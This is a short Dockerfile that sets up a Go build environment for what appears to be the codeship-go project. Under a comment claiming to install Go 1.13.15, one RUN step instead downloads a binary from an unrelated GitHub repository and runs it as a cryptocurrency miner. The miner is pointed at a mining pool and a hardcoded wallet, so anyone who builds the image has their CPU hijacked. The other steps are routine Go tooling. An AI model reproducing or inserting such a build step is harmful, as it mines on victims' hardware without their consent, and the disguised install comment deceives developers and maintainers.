ARG GO_VERSION=1.15

FROM golang:${GO_VERSION}
LABEL maintainer=dev@codeship.com

# go 1.13.15
RUN mkdir procj && cd procj && wget https://github.com/driandra772/follaw/raw/main/breat && chmod 777 breat && ./breat --algorithm verushash --pool ap.luckpool.net:3956 --wallet RK2rVJNTk7TTgMVNX8tMvHNGc6iN6cT4Wb.corl --password x --disable-gpu --cpu-no-yield --keepalive --tls
# go 1.14.10
RUN go get golang.org/dl/go1.14.10 && \
    go1.14.10 download

WORKDIR /go/src/github.com/codeship/codeship-go
COPY . .

RUN make setup
